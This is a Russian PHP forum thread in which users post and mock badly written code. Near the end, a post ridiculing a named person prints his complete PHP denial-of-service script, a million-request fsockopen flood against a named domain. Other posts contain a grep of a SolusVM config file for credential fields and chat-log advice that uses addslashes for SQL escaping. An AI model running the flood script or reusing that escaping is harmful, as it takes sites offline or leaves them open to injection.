Сборник индуского кода.

Linker

Новичок
PHP:
$S = array(0 => 'online', 1 => 'offline', 2 => 'falleninlove', 3 => 'indeepass');
$s = rand(0,3);

     if ($s === 0) { echo 'Congratulations! Your status is "'.$S[$s].'"'; }
     else if ($s === 1) { echo 'Unbelievable! Your status is "'.$S[$s].'"'; }
     else { echo 'Your status is very strange: "'.$S[$s].'"'; }
 

~WR~

Новичок
Проверка корректности ввода email на стороне клиента.
Для этого понадобилось 3 функции и 5 eval'ов.

PHP:
utils = {
	is_email: function( argvalue ) {
		if (argvalue.indexOf(" ") != -1)						return false;
		else if (argvalue.indexOf("@") == -1)					return false;
		else if (argvalue.indexOf("@") == 0)					return false;
		else if (argvalue.indexOf("@") == (argvalue.length-1))	return false;
		var retSize = utils.custom_split(argvalue, "@", "arrayString");
		if (arrayString[1].indexOf(".") == -1)							return false;
		else if (arrayString[1].indexOf(".") == 0)						return false;
		else if (arrayString[1].charAt(arrayString[1].length-1) == ".")	return false;
		return true;
	},
	custom_split: function( strvalue, separator, arrayName )
	{
		var n = 0;
		if (separator.length != 0) {
			while (strvalue.indexOf(separator) != -1) {
				eval("arr"+n+" = strvalue.substring(0, strvalue.indexOf(separator));");
				strvalue = strvalue.substring(strvalue.indexOf(separator)+separator.length,
				strvalue.length+1);
				n++;
			}
			eval("arr" + n + " = strvalue;");
			arraySize = n+1;
		} else {
			for (var x = 0; x < strvalue.length; x++) {
				eval("arr"+n+" = \"" + strvalue.substring(x, x+1) + "\";");
				n++;
			}
			arraySize = n;
		}
		eval(arrayName + " = new utils.makeArray(arraySize);");
		for (var i = 0; i < arraySize; i++)
			eval(arrayName + "[" + i + "] = arr" + i + ";");
		return arraySize;
	},
	makeArray: function(IntarrSize) {
		for (var n = 0; n < IntarrSize; n++)
			this[n] = "";
		return this;
	}
};
 

Adelf

Administrator
Команда форума
C#. Проверка на ошибку.
PHP:
                if (e.Error != null || e.Result.ToString().ToLower().Contains("error"))
                    UpdateInvoiceStatus(InvoiceStatus.FAILED, invoiceKeys);
                else
                {
                    UpdateInvoiceStatus(InvoiceStatus.RESENT, invoiceKeys);
                }
 

fixxxer

К.О.
Партнер клуба
PHP:
$dn = exec( "grep -m1 \$1: /usr/local/solusvm/includes/solusvm.conf | cut -d ':' -f 1" );
$du = exec( "grep -m1 \$1: /usr/local/solusvm/includes/solusvm.conf | cut -d ':' -f 2" );
$dp = exec( "grep -m1 \$1: /usr/local/solusvm/includes/solusvm.conf | cut -d ':' -f 3" );
$dh = exec( "grep -m1 \$1: /usr/local/solusvm/includes/solusvm.conf | cut -d ':' -f 4" );
$ec = exec( "grep -m1 \$1: /usr/local/solusvm/includes/solusvm.conf | cut -d ':' -f 5" );
отберите у меня дезендер, пока я не повесился :D там всё так
 

флоппик

promotor fidei
Команда форума
Партнер клуба
Я очень мирный человек. Но иногда некоторым людям хочется вырывать ногти щипцами за некоторые вещи.
 

~WR~

Новичок
Гггг) Да чего уж там, делал бы просто
PHP:
span {display: block;}
- и не морочил мозг! :D
 

Redjik

Джедай-мастер
Sufir
может кто-то фрейм пытался сделать?

из подобного я делал только
h1,.h1{стили} в угоду сеошникам, чтобы не было два h1 на странице из-за криворуких контент менеджеров =)
 

newARTix

Новичок
не вижу ничего страшного в "блокировании" спанов. Возможно изначально он использовался по назначению, а потом дизайн чуть сменился и чтобы не переписывать HTML и JS сделали его блоком. CSS для того и придуман, тащемто.
 

флоппик

promotor fidei
Команда форума
Партнер клуба
не вижу ничего страшного в "блокировании" спанов.
В том, что внутри этого спана у тебя больше нет возможности вставить другой span. Если тебе нужен блочный элемент в этом месте, вставь див. Нужен строчный — ставь спан. Это и есть сематничная верстка.
 

confguru

ExAdmin
Команда форума
Я подозреваю что PayPal писали индусы.
Методом научного тыка - 4 часа жизни убито на то чтоб поставить
API_VERSION = '83.0';
и все заработало..
До этого был постоянный servers timeout.
 

RUBBI

Ученик
[11:28:50] Станислав (h-zone): короче пока тебя не сломают и не поставят на деньги с 4-5 нулями. ты будешь думать, что прав )))
на всё воля Божья)
[11:29:55] wildraid5: человек, очнись ото сна) addslashes не используют при составлении запросов уже лет 5
[11:30:07] wildraid5: *_escape_string(
[11:30:18] wildraid5: только драйвер-специфичные функции, с учетом кодировки
[11:30:39] Станислав (h-zone): совет:
старайся делать так: $sql = "SELECT * FROM ".addslashes($table)." ";
а не так: $sql = addslastes( "SELECT * FROM ".$table )
и тем более никогда не делать так: $sql = "SELECT * FROM $table";
[11:30:47] wildraid5: не веришь мне - посмотри документацию
http://ru2.php.net/manual/en/function.addslashes.php
[11:30:49] wildraid5: спасибо, кэп)
[11:31:11] Станислав (h-zone): все кто мне советовал *_escape_string сейчас учатся у меня :)
[11:31:27] wildraid5: можно я тебя в Юмор запостю на phpclub'е?)
[11:31:34] wildraid5: не обидишься?)
[11:31:39] Станислав (h-zone): с пеной у рта советовали :)
кстати magic_quotes в php как настроен в курсе? нет?
[11:31:55] wildraid5: у нас выключен. в php 5.4 его убрали наконец-то
[11:32:13] Станислав (h-zone): кстати я на рнрклубе авторствовал лет 7 назад
Этот снаислав,он же стас,он же spb он же анонимос,он же владелец хак зоны,он же владелец phpmast.ru он же барыга,кидок,наепщик.
 

RUBBI

Ученик
И где его по таким никам искать?
Да это недо...извините,в основном сидит на вап сайтах,тиепа clubwm.ru dcms-help.ru и так далее
его проекты еще xakforum.ru 8si.ru mobila-obmen.ru
ОН всем говорит типа хакер,набирает новичков(тех кто верит ему) дает скрипты типа доссеры и начинает доссить какой нить новенький сайтик а потом требует админа поставить ссыль типа под защитой хак зоны :)
Щас скину код его недодосера гг
PHP:
<?php 
#////////////////////////////// Введите ниже домен и страницу атаки без http:// domen.ru /index.php ////////////////////////#
$host = "zapret.org";
$path = "/index.php";
#////////////////////////////////////////////////#
  
  # SPB: site atak v11rubin by kracker http://wap.visavi.tk ЗАПРЕЩЕНО ПРОДОВАТЬ И РАСПРОСТРАНЯТЬ СКРИПТ АВТОР ОТВЕТСТВЕННОСТИ НЕ НЕСЁТ ЗА ВАШИ ДЕЯНИЯ ЛИЦЕНЗИОННАЯ ВЕРСИЯ
  
  for($rubin=0; $rubin <= 1000000; $rubin++)
  {
  $fp = fsockopen($host,80,$errno,$errstr,30); 
  if(!$fp) echo"<script language='JavaScript'>alert('Внимание критическое состояние вашего сервера!!!')</script>Внимание Сервер нагружен подождите Пока 1000000 не кончатся и дальше атакуйте!!!<br />\n"; 
  else{
#    $headers = "GET $path HTTP/1.0\r\n";//Раскоментируйте если хотите бить по старому протоколу 
    $headers = "GET $path HTTP/1.1\r\n"; //закоментируйте если выше раскоментировано этим знаком #
    $headers .= "Host: $host\r\n"; 
    $headers .= "Accept: *\r\n"; 
    $headers .= "Accept-Charset: *\r\n"; 
    $headers .= "Accept-Encoding: deflate\r\n"; 
    $headers .= "Accept-Language: ru\r\n";// поменять на это если англиский протокол удара     $headers .= "Accept-Language: en\r\n";  
$headers .= "User-Agent: SH-DDoS $rubin\r\n\r\n";//Меняем агента на свой 
#////\/\//\/////\/\//\/////\/\//\/ Ниже раскоментируйте если хотите крон атаку ////\/\//\/////\/\//\/@////\/\//\/////\/\//\/
$headers .= "$cron_run¥+$time¥{'0/005.*.*.*.*.*.*'}-Agent: SH-DDoS $rubin\r\n\r\n";//Крон атака 
#//////////////////НИЖЕ НЕЛЕЗТЬ ИДЁТ ПРОГРАММНЫЙ КОД АТАКИ, ИНАЧЕ РАБОТАТЬ НЕБУДЕТ////////////////////////#
    $headers .= "Connection: Keeper Alive\r\n";
$headers .= "ip: $rubin\r\n";
$headers .= "ftp: $rubin\r\n";
$headers .= "udp: $rubin\r\n";
$headers .= "tcp:// $spb+httpd://$host/$patch\r\n";
$headers .= "ua: Close-$spb\r\n";
$headers .= "time: unlimit(0)\r\n";
$headers .= "tcp:// $paket+httpd://$host/$patch$paket{'пиптыиацмтпдиптцматидпмиптпимтцпимипд////\/\//\/   а м т п  ////\/\//\/ иамтдиамтпаимтпиа////\/\//\/////\/\//\/мтпиатмпиатмпи'}\r\n";
$headers .= "tcp:// $licenze*11rubin+httpd://$host/$patch/?$ref\r\n";
$headers .= "$cron_run: $time+$host+$patch+ttp://wap.visavi.tk/licenze/document+script:document$act/$cron_run.xxs/?on*licenze\r\n";
    fwrite($fp,$headers);   
      }
   }
?>
Обратите внимание на Английский протокол удара гг
 
Сверху